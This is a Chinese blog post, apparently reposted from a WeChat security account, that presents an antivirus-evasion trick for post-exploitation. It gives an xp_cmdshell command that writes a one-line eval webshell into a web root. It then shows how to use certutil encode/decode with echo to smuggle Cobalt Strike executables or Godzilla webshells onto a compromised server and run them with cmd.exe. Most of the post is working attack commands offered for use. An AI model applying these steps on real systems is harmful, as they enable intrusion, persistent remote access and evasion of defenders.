文件上传的一个骚操作(低权限+BypassAV)

admin 2020年12月30日10:32:40评论66 views字数 1219阅读4分3秒阅读模式

不知道各位小伙伴在渗透中是否遇见过这个问题:


虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。


本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。


话不多说,例如这样场景:

在数据库连接后或者sqlmap注入连接os-shell后可执行命令:

文件上传的一个骚操作(低权限+BypassAV)

其中包括杀软或某狗、某盾:

文件上传的一个骚操作(低权限+BypassAV)

此时下载文件的各种命令均被拦截:

bitsadmin:

文件上传的一个骚操作(低权限+BypassAV)

certutil证书:

文件上传的一个骚操作(低权限+BypassAV)

还会被杀软报警:

文件上传的一个骚操作(低权限+BypassAV)

powershell也会被彻底封杀:

文件上传的一个骚操作(低权限+BypassAV)

尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)

文件上传的一个骚操作(低权限+BypassAV)


而在这种环境下可在有权限写入的前提下尝试写入一句话木马:

xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\WWW\bmfx.aspx'

但也存在被某狗、WAF杀掉的可能。


此时,骚操作上场,windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码:

本地:

Certutil -encode artifact.txt artifact.exe

或指定路径:

Certutil -encode d:artifact.txt d:artifact.exe

文件上传的一个骚操作(低权限+BypassAV)

将txt文本使用echo命令:

echo sfAFASFAsfasgasdf………>>d:1.txt

写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件):

Certutil -decode art.txt art.exe或:Certutil -decode d:art.txt d:art.exe

文件上传的一个骚操作(低权限+BypassAV)

后续可在命令中执行exe上线:

cmd.exe /c art.exe

重点是:本地解码编码操作不会触发杀软拦截行为!此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例):

文件上传的一个骚操作(低权限+BypassAV)

可在web站点写入文件后访问txt查看写入有无偏差:

文件上传的一个骚操作(低权限+BypassAV)

还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。

但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长:

文件上传的一个骚操作(低权限+BypassAV)

此时就要看各位师傅们在bypass WaF、AV时如何减小体量了,一般cs的马bypass后会在50k左右,使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短,但也有长度限制,具体各位可亲测。

文件上传的一个骚操作(低权限+BypassAV)


文件上传的一个骚操作(低权限+BypassAV)


点赞 在看 转发

原创投稿作者:伞

文件上传的一个骚操作(低权限+BypassAV)

本文始发于微信公众号(HACK学习呀):文件上传的一个骚操作(低权限+BypassAV)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月30日10:32:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   文件上传的一个骚操作(低权限+BypassAV)https://cn-sec.com/archives/226155.html

发表评论

匿名网友 填写信息